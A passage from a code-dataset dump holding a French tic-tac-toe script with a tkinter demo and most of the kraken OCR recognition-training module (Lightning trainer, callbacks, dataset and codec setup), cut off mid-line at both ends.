"usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 286, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 
301, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 303, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 305, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 311, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 313, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 317, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.Formatter.format", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 327, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 342, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 375, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 376, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 378, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 379, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 380, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 383, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 384, "usage_type": "attribute"}, {"api_name": "logging.WARN", 
"line_number": 385, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 386, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 387, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 388, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 390, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 392, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 393, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 398, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 399, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 404, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 405, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 406, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 407, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 408, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 409, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 410, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 411, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 415, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 416, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 417, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 418, "usage_type": 
"attribute"}, {"api_name": "colorama.Fore", "line_number": 419, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 420, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 421, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 422, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 426, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 429, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 432, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 435, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 441, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 444, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 447, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 450, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 453, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 479, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 481, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 483, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 495, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 496, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 502, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.setLoggerClass", "line_number": 513, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 526, "usage_type": "call"}]} +{"seq_id": "380884730", "text": "'''\nDocumentation, License etc.\n\n@package projet_morpion\n'''\n\n# 1ère étape : Ecrire une fonction pour afficher le tableau de jeu. Configurer votre tableau comme une liste, où chaque index 1-9 correspond à un nombre sur un clavier, de sorte que vous obtenez un terrain de 3 par 3.\n\nfrom IPython.display import clear_output\n\ndef affiche_tableau(tableau):\n clear_output()\n print(\"Bienvenue dans le jeu du morpion : \\n\") \n print(' | |')\n print(' ' + tableau[7] + ' | ' + tableau[8] + ' | ' + tableau[9])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[4] + ' | ' + tableau[5] + ' | ' + tableau[6])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[1] + ' | ' + tableau[2] + ' | ' + tableau[3])\n print(' | |')\n\naffiche_tableau(['','X','X','X','O',' ','O','X','X','X'])\n\n# **2ème étape : Ecrire une fonction qui demande au joueur quelle marque «X» ou «O» il veut utiliser et lui assigner. Pensez à utiliser une boucle *while* pour demander une réponse au joueur jusqu'à obtenir une réponse correcte.** \n\ndef pion_joueur():\n \n marque = ''\n while not (marque == 'X' or marque == 'O'):\n marque = input('Joueur 1: Est-ce que vous voulez jouer X ou O ? 
').upper()\n\n if marque == 'X':\n return ('X', 'O')\n else:\n return ('O', 'X') \n\n\n\n\n\nimport tkinter as Tk\nimport time\n\ndef affiche_canevas_tk() :\n N = 3 \n pas=600/N \n root = Tk.Tk() \n c = Tk.Canvas(root,height=600,width=600) \n listidrec=N*[[]] \n for i in range(N): \n listidrec[i]=N*[-1] \n for i in range(N): \n for j in range(N): \n listidrec[i][j] = c.create_rectangle(pas*i, pas*j, pas*(i+1), pas*(j+1), fill='#00FF00') \n \n c.pack()\n def test():\n for i in range(17,256):\n c.itemconfig(listidrec[1][1],fill='#0000'+hex(i)[2:])\n print(hex(i)[2:])\n time.sleep(0.05) \n root.update()\n \n \n b = Tk.Button(text = 'test', command= test)\n b.pack()\n root.mainloop()\n\n# affiche_canevas_tk()\n", "sub_path": "projet_morpion.py", "file_name": "projet_morpion.py", "file_ext": "py", "file_size_in_byte": 2106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "IPython.display.clear_output", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "504846289", "text": "#\n# Copyright 2015 Benjamin Kiessling\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"\nTraining loop interception helpers\n\"\"\"\nimport re\nimport torch\nimport pathlib\nimport logging\nimport warnings\nimport numpy as np\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom functools import partial\nfrom torch.multiprocessing import Pool\nfrom torch.optim import lr_scheduler\nfrom typing import Callable, Dict, Optional, Sequence, Union, Any, List\nfrom pytorch_lightning.callbacks import Callback, EarlyStopping\n\nfrom kraken.lib import models, vgsl, default_specs, progress\nfrom kraken.lib.xml import preparse_xml_data\nfrom kraken.lib.util import make_printable\nfrom kraken.lib.codec import PytorchCodec\nfrom kraken.lib.dataset import (ArrowIPCRecognitionDataset, BaselineSet,\n GroundTruthDataset, PolygonGTDataset,\n ImageInputTransforms, compute_error,\n collate_sequences)\nfrom kraken.lib.models import validate_hyper_parameters\nfrom kraken.lib.exceptions import KrakenInputException, KrakenEncodeException\n\nfrom torch.utils.data import DataLoader, random_split, Subset\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _star_fun(fun, kwargs):\n try:\n return fun(**kwargs)\n except FileNotFoundError as e:\n logger.warning(f'{e.strerror}: {e.filename}. 
Skipping.')\n except KrakenInputException as e:\n logger.warning(str(e))\n return None\n\n\nclass KrakenTrainer(pl.Trainer):\n def __init__(self,\n enable_progress_bar: bool = True,\n enable_summary: bool = True,\n min_epochs: int = 5,\n max_epochs: int = 100,\n pb_ignored_metrics: Sequence[str] = ('loss', 'val_metric'),\n move_metrics_to_cpu: bool = True,\n *args,\n **kwargs):\n kwargs['logger'] = False\n kwargs['enable_checkpointing'] = False\n kwargs['enable_progress_bar'] = enable_progress_bar\n kwargs['min_epochs'] = min_epochs\n kwargs['max_epochs'] = max_epochs\n kwargs['callbacks'] = ([] if 'callbacks' not in kwargs else kwargs['callbacks'])\n kwargs['move_metrics_to_cpu'] = move_metrics_to_cpu\n if not isinstance(kwargs['callbacks'], list):\n kwargs['callbacks'] = [kwargs['callbacks']]\n\n if enable_progress_bar:\n progress_bar_cb = progress.KrakenTrainProgressBar(ignored_metrics=pb_ignored_metrics)\n kwargs['callbacks'].append(progress_bar_cb)\n\n if enable_summary:\n from pytorch_lightning.callbacks import RichModelSummary\n summary_cb = RichModelSummary(max_depth=2)\n kwargs['callbacks'].append(summary_cb)\n kwargs['enable_model_summary'] = False\n\n kwargs['callbacks'].extend([KrakenSetOneChannelMode(), KrakenSaveModel()])\n super().__init__(*args, **kwargs)\n\n def fit(self, *args, **kwargs):\n with warnings.catch_warnings():\n warnings.filterwarnings(action='ignore', category=UserWarning,\n message='The dataloader,')\n super().fit(*args, **kwargs)\n\n\nclass KrakenSetOneChannelMode(Callback):\n \"\"\"\n Callback that sets the one_channel_mode of the model after the first epoch.\n \"\"\"\n def on_train_epoch_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n # fill one_channel_mode after 1 iteration over training data set\n if not trainer.sanity_checking and trainer.current_epoch == 0 and trainer.model.nn.model_type == 'recognition':\n ds = getattr(pl_module, 'train_set', None)\n if not ds and trainer.datamodule:\n ds = trainer.datamodule.train_set\n im_mode = ds.dataset.im_mode\n if im_mode in ['1', 'L']:\n logger.info(f'Setting model one_channel_mode to {im_mode}.')\n trainer.model.nn.one_channel_mode = im_mode\n\n\nclass KrakenSaveModel(Callback):\n \"\"\"\n Kraken's own serialization callback instead of pytorch's.\n \"\"\"\n def on_validation_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n if not trainer.sanity_checking:\n trainer.model.nn.hyper_params['completed_epochs'] += 1\n metric = float(trainer.logged_metrics['val_metric']) if 'val_metric' in trainer.logged_metrics else -1.0\n trainer.model.nn.user_metadata['accuracy'].append((trainer.global_step, metric))\n trainer.model.nn.user_metadata['metrics'].append((trainer.global_step, {k: float(v) for k, v in trainer.logged_metrics.items()}))\n\n logger.info('Saving to {}_{}'.format(trainer.model.output, trainer.current_epoch))\n trainer.model.nn.save_model(f'{trainer.model.output}_{trainer.current_epoch}.mlmodel')\n\n\nclass RecognitionModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict[str, Any] = None,\n output: str = 'model',\n spec: str = default_specs.RECOGNITION_SPEC,\n append: Optional[int] = None,\n model: Optional[Union[pathlib.Path, str]] = None,\n reorder: Union[bool, str] = True,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n 
binary_dataset_split: bool = False,\n num_workers: int = 1,\n load_hyper_parameters: bool = False,\n repolygonize: bool = False,\n force_binarization: bool = False,\n format_type: str = 'path',\n codec: Optional[Dict] = None,\n resize: str = 'fail'):\n \"\"\"\n A LightningModule encapsulating the training setup for a text\n recognition model.\n\n Setup parameters (load, training_data, evaluation_data, ...) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS`) are in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the train() command.\n \"\"\"\n super().__init__()\n hyper_params_ = default_specs.RECOGNITION_HYPER_PARAMS.copy()  # copy so later updates do not mutate the shared defaults\n if model:\n logger.info(f'Loading existing model from {model} ')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'recognition']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `recognition` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n else:\n self.nn = None\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n self.save_hyperparameters(hyper_params_)\n\n self.reorder = reorder\n self.append = append\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n DatasetClass = GroundTruthDataset\n valid_norm = True\n if format_type in ['xml', 'page', 'alto']:\n logger.info(f'Parsing {len(training_data)} XML files for training data')\n training_data = preparse_xml_data(training_data, format_type, repolygonize)\n if evaluation_data:\n logger.info(f'Parsing {len(evaluation_data)} XML files for validation data')\n evaluation_data = preparse_xml_data(evaluation_data, format_type, repolygonize)\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n DatasetClass = PolygonGTDataset\n valid_norm = False\n elif format_type == 'binary':\n DatasetClass = ArrowIPCRecognitionDataset\n if repolygonize:\n logger.warning('Repolygonization enabled in `binary` mode. Will be ignored.')\n valid_norm = False\n logger.info(f'Got {len(training_data)} binary dataset files for training data')\n training_data = [{'file': file} for file in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} binary dataset files for validation data')\n evaluation_data = [{'file': file} for file in evaluation_data]\n elif format_type == 'path':\n if force_binarization:\n logger.warning('Forced binarization enabled in `path` mode. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled in `path` mode. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. 
Will be ignored.')\n binary_dataset_split = False\n logger.info(f'Got {len(training_data)} line strip images for training data')\n training_data = [{'image': im} for im in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} line strip images for validation data')\n evaluation_data = [{'image': im} for im in evaluation_data]\n valid_norm = True\n # format_type is None. Determine training type from length of training data entry\n elif not format_type:\n if len(training_data[0]) >= 4:\n DatasetClass = PolygonGTDataset\n valid_norm = False\n else:\n if force_binarization:\n logger.warning('Forced binarization enabled with box lines. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled with box lines. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n else:\n raise ValueError(f'format_type {format_type} not in [alto, page, xml, path, binary].')\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec {spec} not bracketed')\n self.spec = spec\n # preparse input sizes from vgsl string to seed ground truth data set\n # sizes and dimension ordering.\n if not self.nn:\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n else:\n batch, channels, height, width = self.nn.input\n\n self.transforms = ImageInputTransforms(batch,\n height,\n width,\n channels,\n self.hparams.pad,\n valid_norm,\n force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 32,\n width if width else 400)\n\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if evaluation_data:\n train_set = self._build_dataset(DatasetClass, training_data)\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, evaluation_data)\n self.val_set = Subset(val_set, range(len(val_set)))\n elif binary_dataset_split:\n train_set = self._build_dataset(DatasetClass, training_data, split_filter='train')\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, training_data, split_filter='validation')\n self.val_set = Subset(val_set, range(len(val_set)))\n logger.info(f'Found {len(self.train_set)} (train) / {len(self.val_set)} (val) samples in pre-encoded dataset')\n else:\n train_set = self._build_dataset(DatasetClass, training_data)\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set. (Will disable alphabet mismatch detection.)')\n self.train_set, self.val_set = random_split(train_set, (train_len, val_len))\n\n if len(self.train_set) == 0 or len(self.val_set) == 0:\n raise ValueError('No valid training data was provided to the train '\n 'command. 
Please add valid XML, line, or binary data.')\n\n logger.info(f'Training set {len(self.train_set)} lines, validation set '\n f'{len(self.val_set)} lines, alphabet {len(train_set.alphabet)} '\n 'symbols')\n alpha_diff_only_train = set(self.train_set.dataset.alphabet).difference(set(self.val_set.dataset.alphabet))\n alpha_diff_only_val = set(self.val_set.dataset.alphabet).difference(set(self.train_set.dataset.alphabet))\n if alpha_diff_only_train:\n logger.warning(f'alphabet mismatch: chars in training set only: '\n f'{alpha_diff_only_train} (not included in accuracy test '\n 'during training)')\n if alpha_diff_only_val:\n logger.warning(f'alphabet mismatch: chars in validation set only: {alpha_diff_only_val} (not trained)')\n logger.info('grapheme\\tcount')\n for k, v in sorted(train_set.alphabet.items(), key=lambda x: x[1], reverse=True):\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n\n if codec:\n logger.info('Instantiating codec')\n self.codec = PytorchCodec(codec)\n for k, v in self.codec.c2l.items():\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n else:\n self.codec = None\n\n logger.info('Encoding training set')\n\n def _build_dataset(self,\n DatasetClass,\n training_data,\n **kwargs):\n dataset = DatasetClass(normalization=self.hparams.normalization,\n whitespace_normalization=self.hparams.normalize_whitespace,\n reorder=self.reorder,\n im_transforms=self.transforms,\n augmentation=self.hparams.augment,\n **kwargs)\n\n if (self.num_workers and self.num_workers > 1) and self.format_type != 'binary':\n with Pool(processes=self.num_workers) as pool:\n for im in pool.imap_unordered(partial(_star_fun, dataset.parse), training_data, 5):\n logger.debug(f'Adding sample {im} to training set')\n if im:\n dataset.add(**im)\n else:\n for im in training_data:\n try:\n dataset.add(**im)\n except KrakenInputException as e:\n logger.warning(str(e))\n if self.format_type == 'binary' and self.hparams.normalization:\n logger.debug('Rebuilding dataset using unicode normalization')\n dataset.rebuild_alphabet()\n return dataset\n\n def forward(self, x, seq_lens=None):\n return self.net(x, seq_lens)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n # sequence batch\n if 'seq_lens' in batch:\n seq_lens, label_lens = batch['seq_lens'], batch['target_lens']\n target = (target, label_lens)\n o = self.net(input, seq_lens)\n else:\n o = self.net(input)\n\n seq_lens = o[1]\n output = o[0]\n target_lens = target[1]\n target = target[0]\n # height should be 1 by now\n if output.size(2) != 1:\n raise KrakenInputException('Expected dimension 3 to be 1, actual {}'.format(output.size(2)))\n output = output.squeeze(2)\n # NCW -> WNC\n loss = self.nn.criterion(output.permute(2, 0, 1), # type: ignore\n target,\n seq_lens,\n target_lens)\n return loss\n\n def validation_step(self, batch, batch_idx):\n chars, error = compute_error(self.rec_nn, batch)\n chars = torch.tensor(chars)\n error = torch.tensor(error)\n return {'chars': chars, 'error': error}\n\n def validation_epoch_end(self, outputs):\n chars = torch.stack([x['chars'] for x in outputs]).sum()\n error = torch.stack([x['error'] for x in outputs]).sum()\n accuracy = (chars - error) / (chars + torch.finfo(torch.float).eps)\n if accuracy > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {accuracy} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n 
self.best_metric = accuracy\n logger.info(f'validation run: total chars {chars} errors {error} accuracy {accuracy}')\n self.log_dict({'val_accuracy': accuracy, 'val_metric': accuracy}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if self.append:\n self.train_set.dataset.encode(self.codec)\n # now we can create a new model\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n logger.info(f'Appending {self.spec} to existing model {self.nn.spec} after {self.append}')\n self.nn.append(self.append, self.spec)\n self.nn.add_codec(self.train_set.dataset.codec)\n logger.info(f'Assembled model spec: {self.nn.spec}')\n elif self.model:\n self.spec = self.nn.spec\n\n # prefer explicitly given codec over network codec if mode is 'both'\n codec = self.codec if (self.codec and self.resize == 'both') else self.nn.codec\n\n codec.strict = True\n\n try:\n self.train_set.dataset.encode(codec)\n except KrakenEncodeException:\n alpha_diff = set(self.train_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n alpha_diff_val = set(self.val_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n if self.resize == 'fail':\n raise KrakenInputException(f'Training data and model codec alphabets mismatch: {alpha_diff}')\n elif self.resize == 'add':\n logger.info(f'Resizing codec to include '\n f'{len(alpha_diff.union(alpha_diff_val))} new code points')\n # Add the characters in val only\n codec = codec.add_labels(alpha_diff.union(alpha_diff_val))\n self.nn.add_codec(codec)\n logger.info(f'Resizing last layer in network to {codec.max_label+1} outputs')\n self.nn.resize_output(codec.max_label + 1)\n self.train_set.dataset.encode(self.nn.codec)\n elif self.resize == 'both':\n logger.info(f'Resizing network or given codec to '\n f'{len(self.train_set.dataset.alphabet)+len(self.val_set.dataset.alphabet)} '\n f'code sequences')\n self.train_set.dataset.encode(None)\n ncodec, del_labels = codec.merge(self.train_set.dataset.codec)\n # Add the characters in val only\n val_diff = set(self.val_set.dataset.alphabet).difference(\n set(ncodec.c2l.keys())\n )\n ncodec.add_labels(val_diff)\n # Switch codec.\n self.nn.add_codec(ncodec)\n logger.info(f'Deleting {len(del_labels)} output classes from network '\n f'({len(codec)-len(del_labels)} retained)')\n self.train_set.dataset.encode(ncodec)\n self.nn.resize_output(ncodec.max_label + 1, del_labels)\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n\n self.nn.codec.strict = False\n\n else:\n self.train_set.dataset.encode(self.codec)\n logger.info(f'Creating new model {self.spec} with {self.train_set.dataset.codec.max_label+1} outputs')\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n self.nn = vgsl.TorchVGSLModel(self.spec)\n # initialize weights\n self.nn.init_weights()\n self.nn.add_codec(self.train_set.dataset.codec)\n\n self.val_set.dataset.encode(self.nn.codec)\n\n if self.nn.one_channel_mode and self.train_set.dataset.im_mode != self.nn.one_channel_mode:\n logger.warning(f'Neural network has been trained on mode {self.nn.one_channel_mode} images, '\n f'training set contains mode {self.train_set.dataset.im_mode} data. 
Consider setting `force_binarization`')\n\n if self.format_type != 'path' and self.nn.seg_type == 'bbox':\n logger.warning('Neural network has been trained on bounding box image information but training set is polygonal.')\n\n self.nn.hyper_params = self.hparams\n self.nn.model_type = 'recognition'\n\n if not self.nn.seg_type:\n logger.info(f'Setting seg_type to {self.train_set.dataset.seg_type}.')\n self.nn.seg_type = self.train_set.dataset.seg_type\n\n self.rec_nn = models.TorchSeqRecognizer(self.nn, train=None, device=None)\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n shuffle=True,\n collate_fn=collate_sequences)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n collate_fn=collate_sequences)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_accuracy',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * 